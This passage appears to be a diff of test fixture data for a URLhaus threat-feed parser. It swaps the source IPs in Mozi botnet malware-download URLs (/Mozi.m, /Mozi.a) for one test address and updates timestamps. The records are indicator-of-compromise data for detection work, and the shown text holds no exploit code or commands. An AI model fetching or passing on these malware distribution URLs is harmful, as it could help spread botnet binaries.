"{\"id\":\"961540\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961540/\",\"url\":\"http://89.160.20.156:56507/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 21:07:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -372,18 +372,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://58.252.178.20:57562/Mozi.m", + "original": "http://89.160.20.156:57562/Mozi.m", "scheme": "http", "port": 57562, - "domain": "58.252.178.20", - "full": "http://58.252.178.20:57562/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:57562/Mozi.m" }, - "ip": "58.252.178.20" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.692281921Z", - "original": "{\"id\":\"961541\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961541/\",\"url\":\"http://58.252.178.20:57562/Mozi.m\",\"url_status\":\"online\",\"host\":\"58.252.178.20\",\"date_added\":\"2021-01-14 21:07:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.024471800Z", + "original": "{\"id\":\"961541\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961541/\",\"url\":\"http://89.160.20.156:57562/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 21:07:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -421,18 +421,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://45.176.111.95:48845/Mozi.m", + "original": "http://89.160.20.156:48845/Mozi.m", "scheme": "http", "port": 48845, - "domain": "45.176.111.95", - "full": "http://45.176.111.95:48845/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:48845/Mozi.m" }, - "ip": "45.176.111.95" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.692285407Z", - "original": "{\"id\":\"961542\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961542/\",\"url\":\"http://45.176.111.95:48845/Mozi.m\",\"url_status\":\"online\",\"host\":\"45.176.111.95\",\"date_added\":\"2021-01-14 21:07:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.024479Z", + "original": "{\"id\":\"961542\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961542/\",\"url\":\"http://89.160.20.156:48845/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 21:07:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -470,18 +470,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://42.224.68.97:58245/Mozi.m", + "original": "http://89.160.20.156:58245/Mozi.m", "scheme": "http", "port": 58245, - "domain": "42.224.68.97", - "full": "http://42.224.68.97:58245/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:58245/Mozi.m" }, - "ip": "42.224.68.97" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.692289635Z", - "original": "{\"id\":\"961539\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961539/\",\"url\":\"http://42.224.68.97:58245/Mozi.m\",\"url_status\":\"online\",\"host\":\"42.224.68.97\",\"date_added\":\"2021-01-14 21:07:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.024486700Z", + "original": "{\"id\":\"961539\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961539/\",\"url\":\"http://89.160.20.156:58245/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 21:07:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -519,18 +519,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://222.81.144.207:37198/Mozi.m", + "original": "http://89.160.20.156:37198/Mozi.m", "scheme": "http", "port": 37198, - "domain": "222.81.144.207", - "full": "http://222.81.144.207:37198/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:37198/Mozi.m" }, - "ip": "222.81.144.207" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.692293292Z", - "original": "{\"id\":\"961538\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961538/\",\"url\":\"http://222.81.144.207:37198/Mozi.m\",\"url_status\":\"online\",\"host\":\"222.81.144.207\",\"date_added\":\"2021-01-14 21:06:08 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.024493900Z", + "original": "{\"id\":\"961538\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961538/\",\"url\":\"http://89.160.20.156:37198/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 21:06:08 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -568,18 +568,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://182.127.185.137:33524/Mozi.m", + "original": "http://89.160.20.156:33524/Mozi.m", "scheme": "http", "port": 33524, - "domain": "182.127.185.137", - "full": "http://182.127.185.137:33524/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:33524/Mozi.m" }, - "ip": "182.127.185.137" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.692296869Z", - "original": "{\"id\":\"961537\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961537/\",\"url\":\"http://182.127.185.137:33524/Mozi.m\",\"url_status\":\"online\",\"host\":\"182.127.185.137\",\"date_added\":\"2021-01-14 21:06:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.024501300Z", + "original": "{\"id\":\"961537\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961537/\",\"url\":\"http://89.160.20.156:33524/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 21:06:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -617,18 +617,18 @@ "url": { "path": "/Mozi.a", "extension": "a", - "original": "http://39.84.175.185:48261/Mozi.a", + "original": "http://89.160.20.156:48261/Mozi.a", "scheme": "http", "port": 48261, - "domain": "39.84.175.185", - "full": "http://39.84.175.185:48261/Mozi.a" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:48261/Mozi.a" }, - "ip": "39.84.175.185" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.692301838Z", - "original": "{\"id\":\"961531\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961531/\",\"url\":\"http://39.84.175.185:48261/Mozi.a\",\"url_status\":\"online\",\"host\":\"39.84.175.185\",\"date_added\":\"2021-01-14 21:06:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.024508500Z", + "original": "{\"id\":\"961531\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961531/\",\"url\":\"http://89.160.20.156:48261/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 21:06:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -666,18 +666,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://27.41.11.238:34478/Mozi.m", + "original": "http://89.160.20.156:34478/Mozi.m", "scheme": "http", "port": 34478, - "domain": "27.41.11.238", - "full": "http://27.41.11.238:34478/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:34478/Mozi.m" }, - "ip": "27.41.11.238" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.692305305Z", - "original": "{\"id\":\"961532\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961532/\",\"url\":\"http://27.41.11.238:34478/Mozi.m\",\"url_status\":\"online\",\"host\":\"27.41.11.238\",\"date_added\":\"2021-01-14 21:06:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.024516100Z", + "original": "{\"id\":\"961532\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961532/\",\"url\":\"http://89.160.20.156:34478/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 21:06:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -715,18 +715,18 @@ "url": { "path": "/Mozi.a", "extension": "a", - "original": "http://182.127.133.68:35703/Mozi.a", + "original": "http://89.160.20.156:35703/Mozi.a", "scheme": "http", "port": 35703, - "domain": "182.127.133.68", - "full": "http://182.127.133.68:35703/Mozi.a" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:35703/Mozi.a" }, - "ip": "182.127.133.68" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.692308661Z", - "original": "{\"id\":\"961533\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961533/\",\"url\":\"http://182.127.133.68:35703/Mozi.a\",\"url_status\":\"online\",\"host\":\"182.127.133.68\",\"date_added\":\"2021-01-14 21:06:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.024523500Z", + "original": "{\"id\":\"961533\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961533/\",\"url\":\"http://89.160.20.156:35703/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 21:06:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -764,18 +764,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://27.46.44.102:48666/Mozi.m", + "original": "http://89.160.20.156:48666/Mozi.m", "scheme": "http", "port": 48666, - "domain": "27.46.44.102", - "full": "http://27.46.44.102:48666/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:48666/Mozi.m" }, - "ip": "27.46.44.102" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.692311857Z", - "original": "{\"id\":\"961534\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961534/\",\"url\":\"http://27.46.44.102:48666/Mozi.m\",\"url_status\":\"online\",\"host\":\"27.46.44.102\",\"date_added\":\"2021-01-14 21:06:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.024548900Z", + "original": "{\"id\":\"961534\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961534/\",\"url\":\"http://89.160.20.156:48666/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 21:06:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -813,18 +813,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://39.70.88.65:53923/Mozi.m", + "original": "http://89.160.20.156:53923/Mozi.m", "scheme": "http", "port": 53923, - "domain": "39.70.88.65", - "full": "http://39.70.88.65:53923/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:53923/Mozi.m" }, - "ip": "39.70.88.65" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.692315454Z", - "original": "{\"id\":\"961535\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961535/\",\"url\":\"http://39.70.88.65:53923/Mozi.m\",\"url_status\":\"online\",\"host\":\"39.70.88.65\",\"date_added\":\"2021-01-14 21:06:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.024556600Z", + "original": "{\"id\":\"961535\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961535/\",\"url\":\"http://89.160.20.156:53923/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 21:06:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -862,18 +862,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://42.224.136.237:52794/Mozi.m", + "original": "http://89.160.20.156:52794/Mozi.m", "scheme": "http", "port": 52794, - "domain": "42.224.136.237", - "full": "http://42.224.136.237:52794/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:52794/Mozi.m" }, - "ip": "42.224.136.237" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.692318870Z", - "original": "{\"id\":\"961536\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961536/\",\"url\":\"http://42.224.136.237:52794/Mozi.m\",\"url_status\":\"online\",\"host\":\"42.224.136.237\",\"date_added\":\"2021-01-14 21:06:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.024563700Z", + "original": "{\"id\":\"961536\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961536/\",\"url\":\"http://89.160.20.156:52794/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 21:06:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -911,18 +911,18 @@ "url": { "path": "/Mozi.a", "extension": "a", - "original": "http://117.208.135.63:49312/Mozi.a", + "original": "http://89.160.20.156:49312/Mozi.a", "scheme": "http", "port": 49312, - "domain": "117.208.135.63", - "full": "http://117.208.135.63:49312/Mozi.a" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:49312/Mozi.a" }, - "ip": "117.208.135.63" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.692541770Z", - "original": "{\"id\":\"961530\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961530/\",\"url\":\"http://117.208.135.63:49312/Mozi.a\",\"url_status\":\"offline\",\"host\":\"117.208.135.63\",\"date_added\":\"2021-01-14 21:05:34 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"false\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.024570900Z", + "original": "{\"id\":\"961530\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961530/\",\"url\":\"http://89.160.20.156:49312/Mozi.a\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 21:05:34 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"false\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -960,18 +960,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://125.47.66.60:38961/Mozi.m", + "original": "http://89.160.20.156:38961/Mozi.m", "scheme": "http", "port": 38961, - "domain": "125.47.66.60", - "full": "http://125.47.66.60:38961/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:38961/Mozi.m" }, - "ip": "125.47.66.60" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.692552110Z", - "original": "{\"id\":\"961525\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961525/\",\"url\":\"http://125.47.66.60:38961/Mozi.m\",\"url_status\":\"online\",\"host\":\"125.47.66.60\",\"date_added\":\"2021-01-14 21:05:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.024577900Z", + "original": "{\"id\":\"961525\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961525/\",\"url\":\"http://89.160.20.156:38961/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 21:05:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -1009,18 +1009,18 @@ "url": { "path": "/Mozi.a", "extension": "a", - "original": "http://182.117.95.148:50420/Mozi.a", + "original": "http://89.160.20.156:50420/Mozi.a", "scheme": "http", "port": 50420, - "domain": "182.117.95.148", - "full": "http://182.117.95.148:50420/Mozi.a" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:50420/Mozi.a" }, - "ip": "182.117.95.148" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.692557149Z", - "original": "{\"id\":\"961526\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961526/\",\"url\":\"http://182.117.95.148:50420/Mozi.a\",\"url_status\":\"online\",\"host\":\"182.117.95.148\",\"date_added\":\"2021-01-14 21:05:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.024585Z", + "original": "{\"id\":\"961526\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961526/\",\"url\":\"http://89.160.20.156:50420/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 21:05:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -1058,18 +1058,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://117.202.71.48:55007/Mozi.m", + "original": "http://89.160.20.156:55007/Mozi.m", "scheme": "http", "port": 55007, - "domain": "117.202.71.48", - "full": "http://117.202.71.48:55007/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:55007/Mozi.m" }, - "ip": "117.202.71.48" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.692560806Z", - "original": "{\"id\":\"961527\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961527/\",\"url\":\"http://117.202.71.48:55007/Mozi.m\",\"url_status\":\"online\",\"host\":\"117.202.71.48\",\"date_added\":\"2021-01-14 21:05:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.024592100Z", + "original": "{\"id\":\"961527\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961527/\",\"url\":\"http://89.160.20.156:55007/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 21:05:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -1107,18 +1107,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://125.99.132.118:51143/Mozi.m", + "original": "http://89.160.20.156:51143/Mozi.m", "scheme": "http", "port": 51143, - "domain": "125.99.132.118", - "full": "http://125.99.132.118:51143/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:51143/Mozi.m" }, - "ip": "125.99.132.118" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.692564293Z", - "original": "{\"id\":\"961528\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961528/\",\"url\":\"http://125.99.132.118:51143/Mozi.m\",\"url_status\":\"online\",\"host\":\"125.99.132.118\",\"date_added\":\"2021-01-14 21:05:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.024599400Z", + "original": "{\"id\":\"961528\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961528/\",\"url\":\"http://89.160.20.156:51143/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 21:05:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -1156,18 +1156,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://182.114.123.69:41003/Mozi.m", + "original": "http://89.160.20.156:41003/Mozi.m", "scheme": "http", "port": 41003, - "domain": "182.114.123.69", - "full": "http://182.114.123.69:41003/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:41003/Mozi.m" }, - "ip": "182.114.123.69" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.692567959Z", - "original": "{\"id\":\"961529\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961529/\",\"url\":\"http://182.114.123.69:41003/Mozi.m\",\"url_status\":\"online\",\"host\":\"182.114.123.69\",\"date_added\":\"2021-01-14 21:05:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.024606700Z", + "original": "{\"id\":\"961529\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961529/\",\"url\":\"http://89.160.20.156:41003/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 21:05:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -1204,18 +1204,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://116.19.127.37:35739/Mozi.m", + "original": "http://89.160.20.156:35739/Mozi.m", "scheme": "http", "port": 35739, - "domain": "116.19.127.37", - "full": "http://116.19.127.37:35739/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:35739/Mozi.m" }, - "ip": "116.19.127.37" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.692571636Z", - "original": "{\"id\":\"961524\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961524/\",\"url\":\"http://116.19.127.37:35739/Mozi.m\",\"url_status\":\"offline\",\"host\":\"116.19.127.37\",\"date_added\":\"2021-01-14 21:04:38 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Gandylyan1\",\"larted\":\"false\",\"tags\":[\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.024613900Z", + "original": "{\"id\":\"961524\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961524/\",\"url\":\"http://89.160.20.156:35739/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 21:04:38 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Gandylyan1\",\"larted\":\"false\",\"tags\":[\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -1252,18 +1252,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://42.239.253.55:45653/Mozi.m", + "original": "http://89.160.20.156:45653/Mozi.m", "scheme": "http", "port": 45653, - "domain": "42.239.253.55", - "full": "http://42.239.253.55:45653/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:45653/Mozi.m" }, - "ip": "42.239.253.55" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.692574692Z", - "original": "{\"id\":\"961523\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961523/\",\"url\":\"http://42.239.253.55:45653/Mozi.m\",\"url_status\":\"offline\",\"host\":\"42.239.253.55\",\"date_added\":\"2021-01-14 21:04:36 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not 